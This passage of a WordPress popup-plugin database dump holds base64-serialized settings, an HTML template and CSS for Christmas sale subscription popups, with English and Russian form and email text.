18xIjtzOjUyOiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy8yMDE2LXEzNTkteG1hc19yaWJib24ucG5nIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiNmZmZmZmYiO3M6OToiYmdfdHlwZV8yIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18yIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMiI7czo3OiIjYWVkMWRlIjtzOjk6ImJnX3R5cGVfMyI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMyI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzMiO3M6NzoiI2Y0MTMwZiI7czo5OiJiZ190eXBlXzQiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzQiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl80IjtzOjc6IiNmZmZmZmYiO3M6MTA6ImZvbnRfbGFiZWwiO3M6MTA6IkFsZXggQnJ1c2giO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiI2ZmZmZmZiI7czoxMDoiZm9udF90eHRfMCI7czoxMjoiSm9zZWZpbiBTYW5zIjtzOjE3OiJ0ZXh0X2ZvbnRfY29sb3JfMCI7czo3OiIjZmZmZmZmIjtzOjExOiJmb250X2Zvb3RlciI7czoxMjoiSm9zZWZpbiBTYW5zIjtzOjE3OiJmb290ZXJfZm9udF9jb2xvciI7czo3OiIjNGY0ZjRmIjtzOjE3OiJyZWlkcmVjdF9vbl9jbG9zZSI7czowOiIiO3M6OToiY2xvc2VfYnRuIjtzOjQ6Im5vbmUiO3M6NzoiYnVsbGV0cyI7czo4OiJwb3BfaWNvbiI7czoxMToibGF5ZXJlZF9wb3MiO3M6MzoidG9wIjtzOjU6ImxhYmVsIjtzOjE1OiJDaHJpc3RtYXMgUGFydHkiO3M6OToiZW5iX3R4dF8wIjtzOjE6IjEiO3M6OToiZm9vdF9ub3RlIjtzOjExODoiV2UgcmVzcGVjdCB5b3VyIHByaXZhY3kuIFlvdXIgaW5mb3JtYXRpb24gd2lsbCBub3QgYmUgc2hhcmVkIHdpdGggYW55IHRoaXJkIHBhcnR5IGFuZCB5b3UgY2FuIHVuc3Vic2NyaWJlIGF0IGFueSB0aW1lICI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjQ6ImJveHkiO3M6ODoiYW5pbV9rZXkiO3M6MTA6InNsaWRlX2Rvd24iO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjEzOiJlbmJfc3Vic2NyaWJlIjtzOjE6IjEiO3M6ODoic3ViX2Rlc3QiO3M6OToid29yZHByZXNzIjtzOjIzOiJzdWJfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxOToic3ViX2F3ZWJlcl9saXN0bmFtZSI7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MjU6InN1Yl9tYWlsY2hpbXBfZ3JvdXBzX2Z1bGwiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTY6InN1Yl9ncl9jeWNsZV9kYXkiO3M6MToiMCI7czoxMzoic3ViX2ljX2FwcF9pZCI7czowOiIiO3M6MTU6InN1Yl9pY19hcHBfdXNlciI7czowOiIiO3M6MTU6InN1Yl9pY19hcHBfcGFzcyI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMzoic3ViX3NmX2FwcF9pZCI7czowOiIiO3M6MTQ6InN1Yl9ja19hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX21lbV9hY2NfaWQiO3M6MDoiIjtzOjE1OiJzdWJfbWVtX3B1ZF9rZXkiO3M6MDoiIjtzOjE2OiJzdWJfbWVtX3ByaXZfa2V5IjtzOjA6IiI7czoxNDoic3ViX3NiX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfdjZfYXBpX2tleSI7czowOiIiO3M6MTI6InN1Yl92dGlnX3VybCI7czowOiIiO3M6MTM6InN1Yl92dGlnX25hbWUiO3M6MDoiIjtzOjEyOiJzdWJfdnRpZ19rZXkiO3M6MDoiIjtzOjE2OiJzdWJfeW1scF9hcGlfa2V5IjtzOjA6IiI7czoxMzoic3ViX3ltbHBfbmFtZSI7czowOiIiO3M6MTE6InN1Yl80ZF9uYW1lIjtzOjA6IiI7czoxMToic3ViXzRkX3Bhc3MiO3M6MDoiIjtzOjEwOiJzdWJfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo2OntzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJzdWJfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToic3ViX3R4dF9zdWNjZXNzIjtzOjI0OiJUaGFuayB5b3UgZm9yIHN1YnNjcmliZSEiO3M6MjE6InN1Yl90eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoyMDoic3ViX3R4dF9leGlzdHNfZW1haWwiO3M6MjM6IkVtcHR5ICBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czoxNzoiR0VUIFlPVVIgRElTQ09VTlQiO3M6MTM6InN1Yl9uZXdfZW1haWwiO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjE1OiJzdWJfbmV3X3N1YmplY3QiO3M6Mjk6Ik5ldyBzdWJzY3JpYmVyIGZvciBbc2l0ZW5hbWVdIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIGlzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6ODoibG9naW5fYnkiO3M6ODoidXNlcm5hbWUiO3M6MTg6ImxvZ2luX3JlZGlyZWN0X3VybCI7czowOiIiO3M6MTU6ImxvZ2luX2J0bl9sYWJlbCI7czoxMDoi0JvQvtCz0LjQvSI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiLQmNC80Y8iO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoicmVnX3R4dF9jb25maXJtX3NlbnQiO3M6MTk1OiLQodGB0YvQu9C60LAg0LTQu9GPINC/0L7QtNGC0LLQtdGA0LbQtNC10L3QuNGPINCx0YvQuyDQvtGC0L/RgNCw0LLQu9C10L3QsCDQvdCwINCy0LDRiCDQsNC00YDQtdGBINGN0LvQtdC60YLRgNC+0L3QvdC+0Lkg0L/QvtGH0YLRiy4g0J/RgNC+0LLQtdGA0YzRgtC1INCy0LDRiNGDINGN0LvQtdC60YLRgNC+0L3QvdGD0Y4g0L/QvtGH0YLRgyEiO3M6MTU6InJlZ190eHRfc3VjY2VzcyI7czo0Mzoi0KHQv9Cw0YHQuNCx0L4g0LfQsCDRgNC10LPQuNGB0YLRgNCw0YbQuNGOISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjU4OiLQn9GD0YHRgtC+0Lkg0LjQu9C4INC90LXQtNC10LnRgdGC0LLQuNGC0LXQu9GM0L3Ri9C5IGVtYWlsIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czo2MToi0J/QvtC00YLQstC10YDQtNC40YLQtSDRgNC10LPQuNGB0YLRgNCw0YbQuNGOINC90LAgW3NpdGVuYW1lXSI7czoyNToicmVnX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InJlZ190eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MzM0OiLQktGLINC30LDRgNC10LPQuNGB0YLRgNC40YDQvtCy0LDQvdGLINC90LAg0YHQsNC50YLQtSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4uINCh0LvQtdC00YPQudGC0LUgIDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4g0LTQu9GPINC30LDQstC10YDRiNC10L3QuNGPINGA0LXQs9C40YHRgtGA0LDRhtC40LguINCV0YHQu9C4INCy0Ysg0L3QtSDQt9Cw0YDQtdCz0LjRgdGC0YDQuNGA0L7QstCw0LvQuNGB0Ywg0LfQtNC10YHRjCAtINC/0YDQvtGB0YLQviDQuNCz0L3QvtGA0LjRgNGD0LnRgtC1INGN0YLQviDRgdC+0L7QsdGJ0LXQvdC40LUuIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjQ1OiJbc2l0ZW5hbWVdICDQktCw0Ygg0LvQvtCz0LjQvSDQuCDQv9Cw0YDQvtC70YwiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjcxOiLQm9C+0LPQuNC9OiBbdXNlcl9sb2dpbl08YnIgLz7Qn9Cw0YDQvtC70Yw6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxNzc6ItCjINCy0LDRgSDQvdC+0LLRi9C5INC/0L7Qu9GM0LfQvtCy0LDRgtC10LvRjCDQvdCwINGB0LDQudGC0LUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCDQstC+0YIg0LjQvdGE0L7RgNC80LDRhtC40Y8g0L/QvtC70YzQt9C+0LLQsNGC0LXQu9GPOiA8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czoxMjoiY29udGFjdF9mb3JtIjtzOjI6IjIwIjtzOjEyOiJzdGF0X2dhX2NvZGUiO3M6MDoiIjtzOjU6InR4dF8wIjtzOjcxOiI8cD5XZSBoYXZlIHNvbWV0aGluZyBmb3IgRVZFUllPTkUgb24gWU9VUiBsaXN0LiBTYXZlIFVwIHRvIDcwJSBPRkYhPC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiNSI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIxIjt9fQ==','<link href=\"https://fonts.googleapis.com/css?family=Oxygen\" rel=\"stylesheet\">\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"ppsTopBgWrapper\">\r\n				<div class=\"ppsWrapImgWr\">\r\n					[if bg_type_1 == \"img\"]\r\n					<img src=\"[bg_img_1]\" class=\"ppsImgWr\"/>\r\n					[endif]\r\n				</div>\r\n				[if enb_label]\r\n					<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				[endif]\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n				<div class=\"ppsSnow\"></div>\r\n			</div>\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_sm]\r\n				<div style=\"clear: both;\"></div>\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n				\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n			<div class=\"\"></div>\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: \"Oxygen\";\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n	[if bg_type_0 == \"color\"]\r\n	background-color: [bg_color_0];\r\n  	[elseif bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	\r\n	position: relative;\r\n	text-align: center;\r\n	padding: 0 0 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n\r\n}\r\n\r\n/*For all Elements*/\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n    \r\n    color: #4f4f4f;\r\n	text-align: center;\r\n	border: 2px solid #aaa;\r\n	font-family: \"Oxygen\";\r\n	font-size: 16px;\r\n	font-weight: normal;\r\n	width: 100%;\r\n	display:block;\r\n	margin-top: 10px;\r\n	height: 45px;\r\n	\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	[if bg_type_4 == \"color\"]\r\n	background: [bg_color_4];\r\n  	[elseif bg_type_4 == \"img\"]\r\n  	background-image: url(\"[bg_img_4]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n	margin-top: 0px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: auto;\r\n	padding-top: 9px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select  {\r\n	display:inline-block;\r\n	margin-top: 0px\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	margin-top: 10px;\r\n	font-size: 16px;\r\n    color: #4f4f4f;\r\n	text-align: center;\r\n	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: inline-block;\r\n	padding-right: 2px;\r\n	vertical-align: middle;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=radio],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=checkbox] {\r\n	vertical-align: middle;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email] {\r\n    \r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	display:block;\r\n	height: 45px;\r\n  	color: #fff;\r\n    font-size: 18px;\r\n	width: 100%;\r\n	margin: 10px 0;\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	border: 0 solid transparent;\r\n  	cursor: pointer;\r\n	text-transform: none;\r\n	padding: 0;\r\n	font-weight: 700;\r\n	font-family: \"Oxygen\";\r\n	[if bg_type_3 == \"color\"]\r\n	background: [bg_color_3];\r\n  	[elseif bg_type_3 == \"img\"]\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell {\r\n    display: inline-block;\r\n    margin: 40px 0 0;\r\n    width: 40%;\r\n	position: relative;\r\n	z-index: 100;\r\n}\r\n#ppsPopupShell_[ID] .ppsTopBgWrapper {\r\n	[if bg_type_2 == \"color\"]\r\n	background: [bg_color_2];\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	\r\n	padding: 30px 0;\r\n	position: relative;\r\n}\r\n#ppsPopupShell_[ID] .ppsWrapImgWr {\r\n	display: inline-block;\r\n    text-align: center;\r\n    width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsImgWr {\r\n	display: inline-block;\r\n	max-width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	font-size: 50px;\r\n	font-family: \"Oxygen\";\r\n	position: relative;\r\n	z-index: 100;\r\n	width: 90%;\r\n	display: inline-block;\r\n	padding-top: 30px;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt {\r\n	margin: 0;\r\n	padding: 0;\r\n	text-align: center;\r\n	font-family: \"Oxygen\";\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt p {\r\n	display: inline-block;\r\n    margin: 0;\r\n    padding: 0;\r\n    width: 90%;\r\n	position: relative;\r\n	z-index: 100;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n    font-size: 20px;\r\n	padding-top: 30px;\r\n	font-weight: bold;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n    display: inline-block;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n	color: #4f4f4f;\r\n    margin: 5px 0px;\r\n    text-align: center;\r\n    width: 80%;\r\n	word-wrap: break-word;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg{\r\n	clear: both;\r\n  	text-align: center;\r\n}','x-mas-sale.png',1,1,1,11,0,0,0,'2015-01-10 17:59:43',45,0),(46,'Merry Christmas',1,0,'YTozOntzOjQ6Im1haW4iO2E6MzA6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMzoib3ZlcmxheV9jbGljayI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjtzOjI0OiJoaWRlX2Zvcl91c2VyX3JvbGVzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjEwNDp7czo1OiJ3aWR0aCI7czozOiI3MDAiO3M6MTM6IndpZHRoX21lYXN1cmUiO3M6MjoicHgiO3M6MTg6ImJnX292ZXJsYXlfb3BhY2l0eSI7czozOiIwLjUiO3M6MTU6ImJnX292ZXJsYXlfdHlwZSI7czo1OiJjb2xvciI7czoxNjoiYmdfb3ZlcmxheV9jb2xvciI7czo0OiIjMDAwIjtzOjE0OiJiZ19vdmVybGF5X2ltZyI7czowOiIiO3M6MTg6ImJnX292ZXJsYXlfaW1nX3BvcyI7czo3OiJzdHJldGNoIjtzOjk6ImJnX3R5cGVfMCI7czozOiJpbWciO3M6ODoiYmdfaW1nXzAiO3M6NDY6IltQUFNfQVNTRVRTX1VSTF1pbWcvYXNzZXRzLzIwMTZfMzYwX255dF9iZy5wbmciO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzEiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18xIjtzOjUxOiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy8yMDE2XzM2MF9ueXRfdG9wX2ltZy5wbmciO3M6MTA6ImJnX2NvbG9yXzEiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzIiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzIiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8yIjtzOjc6IiMxMzMxNmMiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjZmZmZmZmIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiNmOWU2Y2UiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM1ODU4NTgiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6NDoibm9uZSI7czo3OiJidWxsZXRzIjtzOjExOiJsaXN0c19ncmVlbiI7czoxMToibGF5ZXJlZF9wb3MiO3M6MzoidG9wIjtzOjU6ImxhYmVsIjtzOjA6IiI7czo5OiJmb290X25vdGUiO3M6MTE4OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUgIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6NDoiYm94eSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMzoiZW5iX3N1YnNjcmliZSI7czoxOiIxIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjI1OiJzdWJfbWFpbGNoaW1wX2dyb3Vwc19mdWxsIjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXk